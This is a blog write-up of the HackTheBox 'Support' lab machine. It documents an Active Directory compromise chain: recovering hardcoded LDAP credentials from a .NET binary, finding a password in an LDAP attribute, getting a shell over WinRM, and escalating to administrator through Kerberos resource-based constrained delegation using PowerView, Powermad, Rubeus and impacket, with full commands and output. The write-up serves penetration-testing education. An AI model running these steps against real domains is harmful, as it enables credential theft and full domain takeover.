HackTheBox – Support Write-up

Hi everyone! This machine is an Active Directory machine where we have to enumerate SMB shared folder, use dnSpy to reverse engineer a .NET binary for LDAP credentials, LDAP query to find another user’s credentials, initial access via winrm, and privilege escalate using Kerberos Resource-based Constrained Delegation. Let’s get started!

Nmap enumeration

$ IP=10.10.11.174
$ sudo nmap -sC -sV -p- 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-02 06:48:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
52169/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-02T06:49:57
|_  start_date: N/A

SMB enumeration

Readable shared folder

$ smbmap -H $IP -u anonymous
[+] Guest session       IP: 10.10.11.174:445   Name: 10.10.11.174                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        support-tools                                           READ ONLY       support staff tools
        SYSVOL                                                  NO ACCESS       Logon server share
$ smbclient \\\\$IP\\support-tools
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 884023 blocks available
smb: \> get UserInfo.exe.zip

As available software with version numbers is shown to us, a quick google allows me to find a possible privilege escalation vector using 7-Zip. I also found that UserInfo.exe.zip is interesting as there is no official software that is called UserInfo. This binary might contains user credentials.

dnSpy obtaining credentials

While loading into IDA Freeware, I noticed that the binary is a .NET file. Thus, analyzing with dnSpy will be more ideal.

I decided to check out the LdapQuery class since during enumeration, I found out that credentials for LDAP query are required. Since the software can do LDAP queries, it might contain hardcoded credentials for the query.

 

I decided to write a Python script to obtain the plaintext password.

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8")

array = base64.b64decode(enc_password)
array2 = ""

for i in range(len(array)):
    array2 += chr(array[i] ^ key[i % len(key)] ^ 223)

print(array2)
PS C:\Users\lamecarrot\Desktop> py .\support_htb_crack.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

LDAP query

With the newly found credentials, we can do LDAP queries. While searching through the list of users, I noticed an interesting user which is also called support.

$ ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName
...
# requesting: sAMAccountName 
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: Administrators
sAMAccountName: Users
sAMAccountName: Guests
...
sAMAccountName: ldap
sAMAccountName: support
sAMAccountName: smith.rosario
sAMAccountName: hernandez.stanley
sAMAccountName: wilson.shelby
sAMAccountName: anderson.damian
sAMAccountName: thomas.raphael
sAMAccountName: levine.leopoldo
sAMAccountName: raven.clifton
sAMAccountName: bardot.mary
sAMAccountName: cromwell.gerard
sAMAccountName: monroe.david
sAMAccountName: west.laura
sAMAccountName: langley.lucy
sAMAccountName: daughtler.mabel
sAMAccountName: stoll.rachelle
sAMAccountName: ford.victoria
sAMAccountName: MANAGEMENT$

I decided to look into support’s information and found an interesting section called “info”.

$ ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
...

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
...

Initial access

Winrm

Looking at the ports open, we can see that port 5985 is open which is for winrm. We can use evil-winrm to login using the possible found credential.

$ sudo gem install evil-winrm
$ evil-winrm -i $IP -u "support" -p 'Ironside47pleasure40Watchful'
...
*Evil-WinRM* PS C:\Users\support\Documents> 

Giving it a try, I was able to login and obtained a shell.

User.txt

*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         9/12/2022   9:30 PM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
7a******************************
*Evil-WinRM* PS C:\Users\support\Desktop> 

Privilege escalation

References:

Kerberos Resource-based Constrained Delegation

Firstly, we will need to download two PS scripts. Copy paste and execute the commands below in your attacking machine.

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1

Upload them via evil-winrm and import as modules.

upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

We can check if users are allowed to create a new computer object on the domain. By default, a domain member can add up to 10 computers to the domain.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb

Now we have to check if the machine is at least Windows Server 2012.

*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainController

The victim machine is a Windows Server 2022.

Finally, we have to check if the target computer does not have the attribute msds-allowedtoactonbehalfofotheridentity set.

*Evil-WinRM* PS C:\Users\support\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

Create a new computer object

We can now create a new computer object. Paste the following in Powershell to create a new object and note the SID.

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer fake01 -Properties objectsid

Let’s create a new raw security descriptor for the “fake01” computer principal. Remember to change the SID to the value you have just found as well as the DomainComputer’s hostname.

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

Impersonate to get a ticket

Download Rubeus.exe into your attacking machine.

$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe

Upload into the victim’s machine via evil-winrm and generate a RC4 hash.

*Evil-WinRM* PS C:\Users\support\Desktop> upload Rubeus.exe
*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb
...
[*] Action: Calculate Password Hash(es)

[*] Input password             : 123456
[*] Input username             : fake01
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBfake01
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : 3E1A2E5F7675F6BA5C21FDEABFD92B93
[*]       aes256_cts_hmac_sha1 : 37CD1332C1F8DC0C4AA0B738CC971DEBD8D66AED50AF2AF2EC63B7459344B834
[*]       des_cbc_md5          : E0795B98AEA1A16B

We can now a requesting a Kerberos ticket for fake01$ while impersonating an administrator. Remember to change your RC4 hash, username, and domain name.

*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
...
[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'support.htb\fake01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFUjCCBU6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
      AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBCUwggQhoAMCARKhAwIBAqKCBBMEggQPiMLfi1VF
      FWLU+l33k1BX2eTlvLZlRVy0IydwFbFg9rcST4/hs8E/4QC1lC30yBRqTO8ZPwW0Fe56+jGy56xCOZqx
      1pWr4a+x7PfVoUlaP7x3ieqj/k3Vj6x/yxEt+rqHF0yGgXTTSdpTeQOyeh+xV+deEIwdXxniJ4i6ic+1
      G4QKjqGnKMO7zt3z3paOXlpNFmzoVjgv67hMaRP5fZqlvHthhpkwJIuyiIhe+CjvBE+B76OOK2T9/Ew3
      g9G7bsBnrS6sXz11OOKJMFFFn0qZlc8FGquo8mW+O6hNCArEvK2uhPv46FNgCikJZE42SP55ob4r8kJh
      ivya41TlhZFlnsYVSugiK3OBdeOzd4USY/VJhyYrT2yZAfH6m+9a/gUdkWHkIscCii/heQ8AajpDmGGU
      WzGhVufRS0LgugOn93iWr8dnVV3+Ao+TCGQZcjA2dO2QtlUv+Thz6j0r80vZqG+5AICsPRhAxiOGt6FB
      clIdKQJgatJthZlH5HVycBijZPqxFTAy7fJGk20r+5DvQCKp8WhWi/7BrY/pXB2FSq+ZOKjuPovCgKmY
      Rjjd0XuySwm1Xr9JFVzT0nhTGOefNR3t8cjrlBjD749i3IUT9b7yRltEosRQ74jdP061TGShmWEIO6PP
      mGO1IjJzyZ8au3kO/4EXhn1Ns1/tVErfTmHFmFQCHK7QdMNu5ieKkggrKgRjJMrvZL1Uf8py4lm7SKaK
      5X5Tr8/pKqAyyjh923NZgytaP00y3SZ1k98a1vOptbLMALnlJP+yxx1bYKKSZYzLZtGOA8o4adJY4a8N
      f3nIuH0+fkRS7xp8DFyu+z0NtB5whGOLfUMJUH0nuizH10YQEuyyl7DeBDCM5fnU83QtCeemYzG+IyvX
      et7+mK7UexWO2L+ALXEZ6BM/HRD7cHri5iVudifMtdCijcPYYMqEbTYQf4CPNZOby2W8j3DRNy4R6AQi
      e6L0D6u2iIW87rAfizXAFFhjvZuPncji5U4jFquQsrwc6+BkllCcr9LL2FxJGZpN9SQ/DVL0z/M2UoBN
      OgiXPcru3pgZuZyJpw0B4K9O/mjgnkGBdO5XVwXqfVpsOx5PlOVwT6RX3DgCmk0A5VMFfG+DMjT0fvYv
      utnwE61MD4vuXYg2Peqrk6w/YnRGRUtYNp9ukhA7hZktEd2jxnozbuKcxZPmnkPGyx3h4fzHFlHvRkPv
      iAGllehvG2GIe7O2WvGHNk6M4IgueYa7/xVvlz267OC/m5cTwiG8FcjARvS5xWqU6TA3DxjkR8Vc8/Eu
      0w1yH5lIwlvGeJmOJpSCCaWIqWhSONget6DH11DQkSsXzXNRTjjJmqViRTFkmDQXK4uw4p2PkeLS4gVv
      4FhvjKI6Rh6f6tbUV6OB0jCBz6ADAgEAooHHBIHEfYHBMIG+oIG7MIG4MIG1oBswGaADAgEXoRIEELrI
      eZczTUKToiWBxRxJKtOhDRsLU1VQUE9SVC5IVEKiFDASoAMCAQGhCzAJGwdmYWtlMDEkowcDBQBA4QAA
      pREYDzIwMjIwOTEzMTMwMDA2WqYRGA8yMDIyMDkxMzIzMDAwNlqnERgPMjAyMjA5MjAxMzAwMDZaqA0b
      C1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg==


[*] Action: S4U

[*] Building S4U2self request for: 'fake01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'fake01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

      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
      YWtlMDEk

[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      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
      Gw5kYy5zdXBwb3J0Lmh0Yg==

Let’s generate a ticket in the victim’s machine as psexec following the blog post won’t work since we are connecting back to the same machine. Once generated, we will need to download the ticket into our attacking machine.

*Evil-WinRM* PS C:\Users\support\Desktop> [IO.File]::WriteAllBytes("C:\Users\support\Documents\ticket.kirbi", [Convert]::FromBase64String("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"))
*Evil-WinRM* PS C:\Users\support\Desktop> download ticket.kirbi

Make the ticket usable and use it

In our Kali, install an older version of impacket as the latest have some issues for some of the tools, install klist (krb5-user), and pyasn1. We will also need to get ticket_converter.py. Copy and paste the following into your attacking machine.

wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
pip3 install impacket==0.9.24
pip3 install pyasn1
sudo apt update
sudo apt install krb5-user

Next, destroy any tickets in your attacking machine, convert the ticket to Linux usable, set the new ticket’s path.

kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

We must set our hosts file to map the domain name and hostname to the victim’s IP address. Otherwise if we use the IP address instead, it will not work.

$ sudo nano /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali

10.10.11.174 dc.support.htb support.htb

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Finally, we can use the ticket to get a shell in the victim’s machine.

$ impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

Impacket v0.9.24 – Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell – Careful what you execute
[!] Press help for extra shell commands
C:>

root.txt

C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
09/12/2022  09:30 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,884,412,928 bytes free

C:\Users\Administrator\Desktop>type root.txt
f2******************************

C:\Users\Administrator\Desktop>

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. šŸ™‚

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.